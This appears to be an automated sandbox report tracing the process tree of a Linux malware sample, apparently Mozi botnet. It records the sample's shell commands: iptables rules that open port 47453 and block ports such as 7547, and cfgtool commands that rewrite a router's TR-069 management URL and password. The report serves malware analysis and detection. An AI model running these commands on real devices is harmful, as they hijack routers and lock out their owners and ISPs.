                                                                                                    Path:/bin/sh
                                                                                                    Arguments:/bin/sh -c "iptables -I OUTPUT -p tcp --source-port 47453 -j ACCEPT"
                                                                                                    File size:4 bytes
                                                                                                    MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                    Analysis Process: sh PID: 6857 Parent PID: 6855

                                                                                                    General

                                                                                                    Start time:15:44:34
                                                                                                    Start date:16/11/2021
                                                                                                    Path:/bin/sh
                                                                                                    Arguments:n/a
                                                                                                    File size:4 bytes
                                                                                                    MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                    Analysis Process: iptables PID: 6857 Parent PID: 6855

                                                                                                    General

                                                                                                    Start time:15:44:34
                                                                                                    Start date:16/11/2021
                                                                                                    Path:/sbin/iptables
                                                                                                    Arguments:iptables -I OUTPUT -p tcp --source-port 47453 -j ACCEPT
                                                                                                    File size:13 bytes
                                                                                                    MD5 hash:e986504da7dab031032b3d3eac5b643e

                                                                                                    Analysis Process: bin.sh PID: 6858 Parent PID: 6815

                                                                                                    General

                                                                                                    Start time:15:44:34
                                                                                                    Start date:16/11/2021
                                                                                                    Path:/tmp/bin.sh
                                                                                                    Arguments:n/a
                                                                                                    File size:307960 bytes
                                                                                                    MD5 hash:eec5c6c219535fba3a0492ea8118b397

                                                                                                    Analysis Process: sh PID: 6858 Parent PID: 6815

                                                                                                    General

                                                                                                    Start time:15:44:34
                                                                                                    Start date:16/11/2021
                                                                                                    Path:/bin/sh
                                                                                                    Arguments:/bin/sh -c "iptables -I PREROUTING -t nat -p tcp --destination-port 47453 -j ACCEPT"
                                                                                                    File size:4 bytes
                                                                                                    MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                    Analysis Process: sh PID: 6863 Parent PID: 6858

                                                                                                    General

                                                                                                    Start time:15:44:34
                                                                                                    Start date:16/11/2021
                                                                                                    Path:/bin/sh
                                                                                                    Arguments:n/a
                                                                                                    File size:4 bytes
                                                                                                    MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                    Analysis Process: iptables PID: 6863 Parent PID: 6858

                                                                                                    General

                                                                                                    Start time:15:44:34
                                                                                                    Start date:16/11/2021
                                                                                                    Path:/sbin/iptables
                                                                                                    Arguments:iptables -I PREROUTING -t nat -p tcp --destination-port 47453 -j ACCEPT
                                                                                                    File size:13 bytes
                                                                                                    MD5 hash:e986504da7dab031032b3d3eac5b643e

                                                                                                    Analysis Process: bin.sh PID: 6893 Parent PID: 6815

                                                                                                    General

                                                                                                    Start time:15:44:34
                                                                                                    Start date:16/11/2021
                                                                                                    Path:/tmp/bin.sh
                                                                                                    Arguments:n/a
                                                                                                    File size:307960 bytes
                                                                                                    MD5 hash:eec5c6c219535fba3a0492ea8118b397

                                                                                                    Analysis Process: sh PID: 6893 Parent PID: 6815

                                                                                                    General

                                                                                                    Start time:15:44:34
                                                                                                    Start date:16/11/2021
                                                                                                    Path:/bin/sh
                                                                                                    Arguments:/bin/sh -c "iptables -I POSTROUTING -t nat -p tcp --source-port 47453 -j ACCEPT"
                                                                                                    File size:4 bytes
                                                                                                    MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                    Analysis Process: sh PID: 6897 Parent PID: 6893

                                                                                                    General

                                                                                                    Start time:15:44:34
                                                                                                    Start date:16/11/2021
                                                                                                    Path:/bin/sh
                                                                                                    Arguments:n/a
                                                                                                    File size:4 bytes
                                                                                                    MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                    Analysis Process: iptables PID: 6897 Parent PID: 6893

                                                                                                    General

                                                                                                    Start time:15:44:34
                                                                                                    Start date:16/11/2021
                                                                                                    Path:/sbin/iptables
                                                                                                    Arguments:iptables -I POSTROUTING -t nat -p tcp --source-port 47453 -j ACCEPT
                                                                                                    File size:13 bytes
                                                                                                    MD5 hash:e986504da7dab031032b3d3eac5b643e

                                                                                                    Analysis Process: bin.sh PID: 6904 Parent PID: 6815

                                                                                                    General

                                                                                                    Start time:15:44:34
                                                                                                    Start date:16/11/2021
                                                                                                    Path:/tmp/bin.sh
                                                                                                    Arguments:n/a
                                                                                                    File size:307960 bytes
                                                                                                    MD5 hash:eec5c6c219535fba3a0492ea8118b397

                                                                                                    Analysis Process: sh PID: 6904 Parent PID: 6815

                                                                                                    General

                                                                                                    Start time:15:44:34
                                                                                                    Start date:16/11/2021
                                                                                                    Path:/bin/sh
                                                                                                    Arguments:/bin/sh -c "iptables -I INPUT -p tcp --dport 47453 -j ACCEPT"
                                                                                                    File size:4 bytes
                                                                                                    MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                    Analysis Process: sh PID: 6913 Parent PID: 6904

                                                                                                    General

                                                                                                    Start time:15:44:34
                                                                                                    Start date:16/11/2021
                                                                                                    Path:/bin/sh
                                                                                                    Arguments:n/a
                                                                                                    File size:4 bytes
                                                                                                    MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                    Analysis Process: iptables PID: 6913 Parent PID: 6904

                                                                                                    General

                                                                                                    Start time:15:44:34
                                                                                                    Start date:16/11/2021
                                                                                                    Path:/sbin/iptables
                                                                                                    Arguments:iptables -I INPUT -p tcp --dport 47453 -j ACCEPT
                                                                                                    File size:13 bytes
                                                                                                    MD5 hash:e986504da7dab031032b3d3eac5b643e

                                                                                                    Analysis Process: bin.sh PID: 6932 Parent PID: 6815

                                                                                                    General

                                                                                                    Start time:15:44:34
                                                                                                    Start date:16/11/2021
                                                                                                    Path:/tmp/bin.sh
                                                                                                    Arguments:n/a
                                                                                                    File size:307960 bytes
                                                                                                    MD5 hash:eec5c6c219535fba3a0492ea8118b397

                                                                                                    Analysis Process: sh PID: 6932 Parent PID: 6815

                                                                                                    General

                                                                                                    Start time:15:44:34
                                                                                                    Start date:16/11/2021
                                                                                                    Path:/bin/sh
                                                                                                    Arguments:/bin/sh -c "iptables -I OUTPUT -p tcp --sport 47453 -j ACCEPT"
                                                                                                    File size:4 bytes
                                                                                                    MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                    Analysis Process: sh PID: 6935 Parent PID: 6932

                                                                                                    General

                                                                                                    Start time:15:44:34
                                                                                                    Start date:16/11/2021
                                                                                                    Path:/bin/sh
                                                                                                    Arguments:n/a
                                                                                                    File size:4 bytes
                                                                                                    MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                    Analysis Process: iptables PID: 6935 Parent PID: 6932

                                                                                                    General

                                                                                                    Start time:15:44:34
                                                                                                    Start date:16/11/2021
                                                                                                    Path:/sbin/iptables
                                                                                                    Arguments:iptables -I OUTPUT -p tcp --sport 47453 -j ACCEPT
                                                                                                    File size:13 bytes
                                                                                                    MD5 hash:e986504da7dab031032b3d3eac5b643e

                                                                                                    Analysis Process: bin.sh PID: 6940 Parent PID: 6815

                                                                                                    General

                                                                                                    Start time:15:44:34
                                                                                                    Start date:16/11/2021
                                                                                                    Path:/tmp/bin.sh
                                                                                                    Arguments:n/a
                                                                                                    File size:307960 bytes
                                                                                                    MD5 hash:eec5c6c219535fba3a0492ea8118b397

                                                                                                    Analysis Process: sh PID: 6940 Parent PID: 6815

                                                                                                    General

                                                                                                    Start time:15:44:34
                                                                                                    Start date:16/11/2021
                                                                                                    Path:/bin/sh
                                                                                                    Arguments:/bin/sh -c "iptables -I PREROUTING -t nat -p tcp --dport 47453 -j ACCEPT"
                                                                                                    File size:4 bytes
                                                                                                    MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                    Analysis Process: sh PID: 6948 Parent PID: 6940

                                                                                                    General

                                                                                                    Start time:15:44:34
                                                                                                    Start date:16/11/2021
                                                                                                    Path:/bin/sh
                                                                                                    Arguments:n/a
                                                                                                    File size:4 bytes
                                                                                                    MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                    Analysis Process: iptables PID: 6948 Parent PID: 6940

                                                                                                    General

                                                                                                    Start time:15:44:34
                                                                                                    Start date:16/11/2021
                                                                                                    Path:/sbin/iptables
                                                                                                    Arguments:iptables -I PREROUTING -t nat -p tcp --dport 47453 -j ACCEPT
                                                                                                    File size:13 bytes
                                                                                                    MD5 hash:e986504da7dab031032b3d3eac5b643e

                                                                                                    Analysis Process: bin.sh PID: 6967 Parent PID: 6815

                                                                                                    General

                                                                                                    Start time:15:44:34
                                                                                                    Start date:16/11/2021
                                                                                                    Path:/tmp/bin.sh
                                                                                                    Arguments:n/a
                                                                                                    File size:307960 bytes
                                                                                                    MD5 hash:eec5c6c219535fba3a0492ea8118b397

                                                                                                    Analysis Process: sh PID: 6967 Parent PID: 6815

                                                                                                    General

                                                                                                    Start time:15:44:34
                                                                                                    Start date:16/11/2021
                                                                                                    Path:/bin/sh
                                                                                                    Arguments:/bin/sh -c "iptables -I POSTROUTING -t nat -p tcp --sport 47453 -j ACCEPT"
                                                                                                    File size:4 bytes
                                                                                                    MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                    Analysis Process: sh PID: 6973 Parent PID: 6967

                                                                                                    General

                                                                                                    Start time:15:44:34
                                                                                                    Start date:16/11/2021
                                                                                                    Path:/bin/sh
                                                                                                    Arguments:n/a
                                                                                                    File size:4 bytes
                                                                                                    MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                    Analysis Process: iptables PID: 6973 Parent PID: 6967

                                                                                                    General

                                                                                                    Start time:15:44:34
                                                                                                    Start date:16/11/2021
                                                                                                    Path:/sbin/iptables
                                                                                                    Arguments:iptables -I POSTROUTING -t nat -p tcp --sport 47453 -j ACCEPT
                                                                                                    File size:13 bytes
                                                                                                    MD5 hash:e986504da7dab031032b3d3eac5b643e

                                                                                                    Analysis Process: bin.sh PID: 6819 Parent PID: 6792

                                                                                                    General

                                                                                                    Start time:15:44:24
                                                                                                    Start date:16/11/2021
                                                                                                    Path:/tmp/bin.sh
                                                                                                    Arguments:n/a
                                                                                                    File size:307960 bytes
                                                                                                    MD5 hash:eec5c6c219535fba3a0492ea8118b397

                                                                                                    Analysis Process: bin.sh PID: 6821 Parent PID: 6792

                                                                                                    General

                                                                                                    Start time:15:44:29
                                                                                                    Start date:16/11/2021
                                                                                                    Path:/tmp/bin.sh
                                                                                                    Arguments:n/a
                                                                                                    File size:307960 bytes
                                                                                                    MD5 hash:eec5c6c219535fba3a0492ea8118b397

                                                                                                    Analysis Process: bin.sh PID: 6823 Parent PID: 6792

                                                                                                    General

                                                                                                    Start time:15:44:34
                                                                                                    Start date:16/11/2021
                                                                                                    Path:/tmp/bin.sh
                                                                                                    Arguments:n/a
                                                                                                    File size:307960 bytes
                                                                                                    MD5 hash:eec5c6c219535fba3a0492ea8118b397

                                                                                                    Analysis Process: bin.sh PID: 6990 Parent PID: 6792

                                                                                                    General

                                                                                                    Start time:15:44:39
                                                                                                    Start date:16/11/2021
                                                                                                    Path:/tmp/bin.sh
                                                                                                    Arguments:n/a
                                                                                                    File size:307960 bytes
                                                                                                    MD5 hash:eec5c6c219535fba3a0492ea8118b397

                                                                                                    Analysis Process: sh PID: 6990 Parent PID: 6792

                                                                                                    General

                                                                                                    Start time:15:44:39
                                                                                                    Start date:16/11/2021
                                                                                                    Path:/bin/sh
                                                                                                    Arguments:/bin/sh -c "iptables -I INPUT -p tcp --destination-port 58000 -j DROP"
                                                                                                    File size:4 bytes
                                                                                                    MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                    Analysis Process: sh PID: 6992 Parent PID: 6990

                                                                                                    General

                                                                                                    Start time:15:44:39
                                                                                                    Start date:16/11/2021
                                                                                                    Path:/bin/sh
                                                                                                    Arguments:n/a
                                                                                                    File size:4 bytes
                                                                                                    MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                    Analysis Process: iptables PID: 6992 Parent PID: 6990

                                                                                                    General

                                                                                                    Start time:15:44:39
                                                                                                    Start date:16/11/2021
                                                                                                    Path:/sbin/iptables
                                                                                                    Arguments:iptables -I INPUT -p tcp --destination-port 58000 -j DROP
                                                                                                    File size:13 bytes
                                                                                                    MD5 hash:e986504da7dab031032b3d3eac5b643e

                                                                                                    Analysis Process: bin.sh PID: 6993 Parent PID: 6792

                                                                                                    General

                                                                                                    Start time:15:44:39
                                                                                                    Start date:16/11/2021
                                                                                                    Path:/tmp/bin.sh
                                                                                                    Arguments:n/a
                                                                                                    File size:307960 bytes
                                                                                                    MD5 hash:eec5c6c219535fba3a0492ea8118b397

                                                                                                    Analysis Process: sh PID: 6993 Parent PID: 6792

                                                                                                    General

                                                                                                    Start time:15:44:39
                                                                                                    Start date:16/11/2021
                                                                                                    Path:/bin/sh
                                                                                                    Arguments:/bin/sh -c "iptables -I OUTPUT -p tcp --source-port 58000 -j DROP"
                                                                                                    File size:4 bytes
                                                                                                    MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                    Analysis Process: sh PID: 6995 Parent PID: 6993

                                                                                                    General

                                                                                                    Start time:15:44:39
                                                                                                    Start date:16/11/2021
                                                                                                    Path:/bin/sh
                                                                                                    Arguments:n/a
                                                                                                    File size:4 bytes
                                                                                                    MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                    Analysis Process: iptables PID: 6995 Parent PID: 6993

                                                                                                    General

                                                                                                    Start time:15:44:39
                                                                                                    Start date:16/11/2021
                                                                                                    Path:/sbin/iptables
                                                                                                    Arguments:iptables -I OUTPUT -p tcp --source-port 58000 -j DROP
                                                                                                    File size:13 bytes
                                                                                                    MD5 hash:e986504da7dab031032b3d3eac5b643e

                                                                                                    Analysis Process: bin.sh PID: 6996 Parent PID: 6792

                                                                                                    General

                                                                                                    Start time:15:44:39
                                                                                                    Start date:16/11/2021
                                                                                                    Path:/tmp/bin.sh
                                                                                                    Arguments:n/a
                                                                                                    File size:307960 bytes
                                                                                                    MD5 hash:eec5c6c219535fba3a0492ea8118b397

                                                                                                    Analysis Process: sh PID: 6996 Parent PID: 6792

                                                                                                    General

                                                                                                    Start time:15:44:39
                                                                                                    Start date:16/11/2021
                                                                                                    Path:/bin/sh
                                                                                                    Arguments:/bin/sh -c "iptables -I INPUT -p tcp --dport 58000 -j DROP"
                                                                                                    File size:4 bytes
                                                                                                    MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                    Analysis Process: sh PID: 6998 Parent PID: 6996

                                                                                                    General

                                                                                                    Start time:15:44:39
                                                                                                    Start date:16/11/2021
                                                                                                    Path:/bin/sh
                                                                                                    Arguments:n/a
                                                                                                    File size:4 bytes
                                                                                                    MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                    Analysis Process: iptables PID: 6998 Parent PID: 6996

                                                                                                    General

                                                                                                    Start time:15:44:39
                                                                                                    Start date:16/11/2021
                                                                                                    Path:/sbin/iptables
                                                                                                    Arguments:iptables -I INPUT -p tcp --dport 58000 -j DROP
                                                                                                    File size:13 bytes
                                                                                                    MD5 hash:e986504da7dab031032b3d3eac5b643e

                                                                                                    Analysis Process: bin.sh PID: 7002 Parent PID: 6792

                                                                                                    General

                                                                                                    Start time:15:44:39
                                                                                                    Start date:16/11/2021
                                                                                                    Path:/tmp/bin.sh
                                                                                                    Arguments:n/a
                                                                                                    File size:307960 bytes
                                                                                                    MD5 hash:eec5c6c219535fba3a0492ea8118b397

                                                                                                    Analysis Process: sh PID: 7002 Parent PID: 6792

                                                                                                    General

                                                                                                    Start time:15:44:39
                                                                                                    Start date:16/11/2021
                                                                                                    Path:/bin/sh
                                                                                                    Arguments:/bin/sh -c "iptables -I OUTPUT -p tcp --sport 58000 -j DROP"
                                                                                                    File size:4 bytes
                                                                                                    MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                    Analysis Process: sh PID: 7010 Parent PID: 7002

                                                                                                    General

                                                                                                    Start time:15:44:39
                                                                                                    Start date:16/11/2021
                                                                                                    Path:/bin/sh
                                                                                                    Arguments:n/a
                                                                                                    File size:4 bytes
                                                                                                    MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                    Analysis Process: iptables PID: 7010 Parent PID: 7002

                                                                                                    General

                                                                                                    Start time:15:44:39
                                                                                                    Start date:16/11/2021
                                                                                                    Path:/sbin/iptables
                                                                                                    Arguments:iptables -I OUTPUT -p tcp --sport 58000 -j DROP
                                                                                                    File size:13 bytes
                                                                                                    MD5 hash:e986504da7dab031032b3d3eac5b643e

                                                                                                    Analysis Process: bin.sh PID: 7031 Parent PID: 6792

                                                                                                    General

                                                                                                    Start time:15:44:39
                                                                                                    Start date:16/11/2021
                                                                                                    Path:/tmp/bin.sh
                                                                                                    Arguments:n/a
                                                                                                    File size:307960 bytes
                                                                                                    MD5 hash:eec5c6c219535fba3a0492ea8118b397

                                                                                                    Analysis Process: sh PID: 7031 Parent PID: 6792

                                                                                                    General

                                                                                                    Start time:15:44:39
                                                                                                    Start date:16/11/2021
                                                                                                    Path:/bin/sh
                                                                                                    Arguments:/bin/sh -c "cfgtool set /mnt/jffs2/hw_ctree.xml InternetGatewayDevice.ManagementServer URL \"http://127.0.0.1\""
                                                                                                    File size:4 bytes
                                                                                                    MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                    Analysis Process: bin.sh PID: 7047 Parent PID: 6792

                                                                                                    General

                                                                                                    Start time:15:44:39
                                                                                                    Start date:16/11/2021
                                                                                                    Path:/tmp/bin.sh
                                                                                                    Arguments:n/a
                                                                                                    File size:307960 bytes
                                                                                                    MD5 hash:eec5c6c219535fba3a0492ea8118b397

                                                                                                    Analysis Process: sh PID: 7047 Parent PID: 6792

                                                                                                    General

                                                                                                    Start time:15:44:39
                                                                                                    Start date:16/11/2021
                                                                                                    Path:/bin/sh
                                                                                                    Arguments:/bin/sh -c "cfgtool set /mnt/jffs2/hw_ctree.xml InternetGatewayDevice.ManagementServer ConnectionRequestPassword \"acsMozi\""
                                                                                                    File size:4 bytes
                                                                                                    MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                    Analysis Process: bin.sh PID: 7060 Parent PID: 6792

                                                                                                    General

                                                                                                    Start time:15:44:39
                                                                                                    Start date:16/11/2021
                                                                                                    Path:/tmp/bin.sh
                                                                                                    Arguments:n/a
                                                                                                    File size:307960 bytes
                                                                                                    MD5 hash:eec5c6c219535fba3a0492ea8118b397

                                                                                                    Analysis Process: sh PID: 7060 Parent PID: 6792

                                                                                                    General

                                                                                                    Start time:15:44:39
                                                                                                    Start date:16/11/2021
                                                                                                    Path:/bin/sh
                                                                                                    Arguments:/bin/sh -c "iptables -I INPUT -p tcp --destination-port 35000 -j DROP"
                                                                                                    File size:4 bytes
                                                                                                    MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                    Analysis Process: sh PID: 7067 Parent PID: 7060

                                                                                                    General

                                                                                                    Start time:15:44:39
                                                                                                    Start date:16/11/2021
                                                                                                    Path:/bin/sh
                                                                                                    Arguments:n/a
                                                                                                    File size:4 bytes
                                                                                                    MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                    Analysis Process: iptables PID: 7067 Parent PID: 7060

                                                                                                    General

                                                                                                    Start time:15:44:39
                                                                                                    Start date:16/11/2021
                                                                                                    Path:/sbin/iptables
                                                                                                    Arguments:iptables -I INPUT -p tcp --destination-port 35000 -j DROP
                                                                                                    File size:13 bytes
                                                                                                    MD5 hash:e986504da7dab031032b3d3eac5b643e

                                                                                                    Analysis Process: bin.sh PID: 7087 Parent PID: 6792

                                                                                                    General

                                                                                                    Start time:15:44:39
                                                                                                    Start date:16/11/2021
                                                                                                    Path:/tmp/bin.sh
                                                                                                    Arguments:n/a
                                                                                                    File size:307960 bytes
                                                                                                    MD5 hash:eec5c6c219535fba3a0492ea8118b397

                                                                                                    Analysis Process: sh PID: 7087 Parent PID: 6792

                                                                                                    General

                                                                                                    Start time:15:44:39
                                                                                                    Start date:16/11/2021
                                                                                                    Path:/bin/sh
                                                                                                    Arguments:/bin/sh -c "iptables -I INPUT -p tcp --destination-port 50023 -j DROP"
                                                                                                    File size:4 bytes
                                                                                                    MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                    Analysis Process: sh PID: 7093 Parent PID: 7087

                                                                                                    General

                                                                                                    Start time:15:44:39
                                                                                                    Start date:16/11/2021
                                                                                                    Path:/bin/sh
                                                                                                    Arguments:n/a
                                                                                                    File size:4 bytes
                                                                                                    MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                    Analysis Process: iptables PID: 7093 Parent PID: 7087

                                                                                                    General

                                                                                                    Start time:15:44:39
                                                                                                    Start date:16/11/2021
                                                                                                    Path:/sbin/iptables
                                                                                                    Arguments:iptables -I INPUT -p tcp --destination-port 50023 -j DROP
                                                                                                    File size:13 bytes
                                                                                                    MD5 hash:e986504da7dab031032b3d3eac5b643e

                                                                                                    Analysis Process: bin.sh PID: 7114 Parent PID: 6792

                                                                                                    General

                                                                                                    Start time:15:44:39
                                                                                                    Start date:16/11/2021
                                                                                                    Path:/tmp/bin.sh
                                                                                                    Arguments:n/a
                                                                                                    File size:307960 bytes
                                                                                                    MD5 hash:eec5c6c219535fba3a0492ea8118b397

                                                                                                    Analysis Process: sh PID: 7114 Parent PID: 6792

                                                                                                    General

                                                                                                    Start time:15:44:39
                                                                                                    Start date:16/11/2021
                                                                                                    Path:/bin/sh
                                                                                                    Arguments:/bin/sh -c "iptables -I OUTPUT -p tcp --source-port 50023 -j DROP"
                                                                                                    File size:4 bytes
                                                                                                    MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                    Analysis Process: sh PID: 7122 Parent PID: 7114

                                                                                                    General

                                                                                                    Start time:15:44:39
                                                                                                    Start date:16/11/2021
                                                                                                    Path:/bin/sh
                                                                                                    Arguments:n/a
                                                                                                    File size:4 bytes
                                                                                                    MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                    Analysis Process: iptables PID: 7122 Parent PID: 7114

                                                                                                    General

                                                                                                    Start time:15:44:39
                                                                                                    Start date:16/11/2021
                                                                                                    Path:/sbin/iptables
                                                                                                    Arguments:iptables -I OUTPUT -p tcp --source-port 50023 -j DROP
                                                                                                    File size:13 bytes
                                                                                                    MD5 hash:e986504da7dab031032b3d3eac5b643e

                                                                                                    Analysis Process: bin.sh PID: 7140 Parent PID: 6792

                                                                                                    General

                                                                                                    Start time:15:44:39
                                                                                                    Start date:16/11/2021
                                                                                                    Path:/tmp/bin.sh
                                                                                                    Arguments:n/a
                                                                                                    File size:307960 bytes
                                                                                                    MD5 hash:eec5c6c219535fba3a0492ea8118b397

                                                                                                    Analysis Process: sh PID: 7140 Parent PID: 6792

                                                                                                    General

                                                                                                    Start time:15:44:39
                                                                                                    Start date:16/11/2021
                                                                                                    Path:/bin/sh
                                                                                                    Arguments:/bin/sh -c "iptables -I OUTPUT -p tcp --source-port 35000 -j DROP"
                                                                                                    File size:4 bytes
                                                                                                    MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                    Analysis Process: sh PID: 7145 Parent PID: 7140

                                                                                                    General

                                                                                                    Start time:15:44:39
                                                                                                    Start date:16/11/2021
                                                                                                    Path:/bin/sh
                                                                                                    Arguments:n/a
                                                                                                    File size:4 bytes
                                                                                                    MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                    Analysis Process: iptables PID: 7145 Parent PID: 7140

                                                                                                    General

                                                                                                    Start time:15:44:39
                                                                                                    Start date:16/11/2021
                                                                                                    Path:/sbin/iptables
                                                                                                    Arguments:iptables -I OUTPUT -p tcp --source-port 35000 -j DROP
                                                                                                    File size:13 bytes
                                                                                                    MD5 hash:e986504da7dab031032b3d3eac5b643e

                                                                                                    Analysis Process: bin.sh PID: 7158 Parent PID: 6792

                                                                                                    General

                                                                                                    Start time:15:44:39
                                                                                                    Start date:16/11/2021
                                                                                                    Path:/tmp/bin.sh
                                                                                                    Arguments:n/a
                                                                                                    File size:307960 bytes
                                                                                                    MD5 hash:eec5c6c219535fba3a0492ea8118b397

                                                                                                    Analysis Process: sh PID: 7158 Parent PID: 6792

                                                                                                    General

                                                                                                    Start time:15:44:39
                                                                                                    Start date:16/11/2021
                                                                                                    Path:/bin/sh
                                                                                                    Arguments:/bin/sh -c "iptables -I INPUT -p tcp --destination-port 7547 -j DROP"
                                                                                                    File size:4 bytes
                                                                                                    MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                    Analysis Process: sh PID: 7163 Parent PID: 7158

                                                                                                    General

                                                                                                    Start time:15:44:39
                                                                                                    Start date:16/11/2021
                                                                                                    Path:/bin/sh
                                                                                                    Arguments:n/a
                                                                                                    File size:4 bytes
                                                                                                    MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                    Analysis Process: iptables PID: 7163 Parent PID: 7158

                                                                                                    General

                                                                                                    Start time:15:44:39
                                                                                                    Start date:16/11/2021
                                                                                                    Path:/sbin/iptables
                                                                                                    Arguments:iptables -I INPUT -p tcp --destination-port 7547 -j DROP
                                                                                                    File size:13 bytes
                                                                                                    MD5 hash:e986504da7dab031032b3d3eac5b643e

                                                                                                    Analysis Process: bin.sh PID: 7171 Parent PID: 6792

                                                                                                    General

                                                                                                    Start time:15:44:39
                                                                                                    Start date:16/11/2021
                                                                                                    Path:/tmp/bin.sh
                                                                                                    Arguments:n/a
                                                                                                    File size:307960 bytes
                                                                                                    MD5 hash:eec5c6c219535fba3a0492ea8118b397

                                                                                                    Analysis Process: sh PID: 7171 Parent PID: 6792

                                                                                                    General

                                                                                                    Start time:15:44:39
                                                                                                    Start date:16/11/2021
                                                                                                    Path:/bin/sh
                                                                                                    Arguments:/bin/sh -c "iptables -I OUTPUT -p tcp --source-port 7547 -j DROP"
                                                                                                    File size:4 bytes
                                                                                                    MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                    Analysis Process: sh PID: 7179 Parent PID: 7171

                                                                                                    General

                                                                                                    Start time:15:44:39
                                                                                                    Start date:16/11/2021
                                                                                                    Path:/bin/sh
                                                                                                    Arguments:n/a
                                                                                                    File size:4 bytes
                                                                                                    MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                    Analysis Process: iptables PID: 7179 Parent PID: 7171

                                                                                                    General

                                                                                                    Start time:15:44:39
                                                                                                    Start date:16/11/2021
                                                                                                    Path:/sbin/iptables
                                                                                                    Arguments:iptables -I OUTPUT -p tcp --source-port 7547 -j DROP
                                                                                                    File size:13 bytes
                                                                                                    MD5 hash:e986504da7dab031032b3d3eac5b643e

                                                                                                    Analysis Process: bin.sh PID: 7194 Parent PID: 6792

                                                                                                    General

                                                                                                    Start time:15:44:39
                                                                                                    Start date:16/11/2021
                                                                                                    Path:/tmp/bin.sh
                                                                                                    Arguments:n/a
                                                                                                    File size:307960 bytes
                                                                                                    MD5 hash:eec5c6c219535fba3a0492ea8118b397

                                                                                                    Analysis Process: sh PID: 7194 Parent PID: 6792

                                                                                                    General

                                                                                                    Start time:15:44:39
                                                                                                    Start date:16/11/2021
                                                                                                    Path:/bin/sh
                                                                                                    Arguments:/bin/sh -c "iptables -I INPUT -p tcp --dport 35000 -j DROP"
                                                                                                    File size:4 bytes
                                                                                                    MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                    Analysis Process: sh PID: 7200 Parent PID: 7194

                                                                                                    General

                                                                                                    Start time:15:44:39
                                                                                                    Start date:16/11/2021
                                                                                                    Path:/bin/sh
                                                                                                    Arguments:n/a
                                                                                                    File size:4 bytes
                                                                                                    MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                    Analysis Process: iptables PID: 7200 Parent PID: 7194

                                                                                                    General

                                                                                                    Start time:15:44:39
                                                                                                    Start date:16/11/2021
                                                                                                    Path:/sbin/iptables
                                                                                                    Arguments:iptables -I INPUT -p tcp --dport 35000 -j DROP
                                                                                                    File size:13 bytes
                                                                                                    MD5 hash:e986504da7dab031032b3d3eac5b643e

                                                                                                    Analysis Process: bin.sh PID: 7209 Parent PID: 6792

                                                                                                    General

                                                                                                    Start time:15:44:39
                                                                                                    Start date:16/11/2021
                                                                                                    Path:/tmp/bin.sh
                                                                                                    Arguments:n/a
                                                                                                    File size:307960 bytes
                                                                                                    MD5 hash:eec5c6c219535fba3a0492ea8118b397

                                                                                                    Analysis Process: sh PID: 7209 Parent PID: 6792

                                                                                                    General

                                                                                                    Start time:15:44:39
                                                                                                    Start date:16/11/2021
                                                                                                    Path:/bin/sh
                                                                                                    Arguments:/bin/sh -c "iptables -I INPUT -p tcp --dport 50023 -j DROP"
                                                                                                    File size:4 bytes
                                                                                                    MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                    Analysis Process: sh PID: 7216 Parent PID: 7209

                                                                                                    General

                                                                                                    Start time:15:44:39
                                                                                                    Start date:16/11/2021
                                                                                                    Path:/bin/sh
                                                                                                    Arguments:n/a
                                                                                                    File size:4 bytes
                                                                                                    MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                    Analysis Process: iptables PID: 7216 Parent PID: 7209

                                                                                                    General

                                                                                                    Start time:15:44:39
                                                                                                    Start date:16/11/2021
                                                                                                    Path:/sbin/iptables
                                                                                                    Arguments:iptables -I INPUT -p tcp --dport 50023 -j DROP
                                                                                                    File size:13 bytes
                                                                                                    MD5 hash:e986504da7dab031032b3d3eac5b643e

                                                                                                    Analysis Process: bin.sh PID: 7224 Parent PID: 6792

                                                                                                    General

                                                                                                    Start time:15:44:39
                                                                                                    Start date:16/11/2021
                                                                                                    Path:/tmp/bin.sh
                                                                                                    Arguments:n/a
                                                                                                    File size:307960 bytes
                                                                                                    MD5 hash:eec5c6c219535fba3a0492ea8118b397

                                                                                                    Analysis Process: sh PID: 7224 Parent PID: 6792

                                                                                                    General

                                                                                                    Start time:15:44:39
                                                                                                    Start date:16/11/2021
                                                                                                    Path:/bin/sh
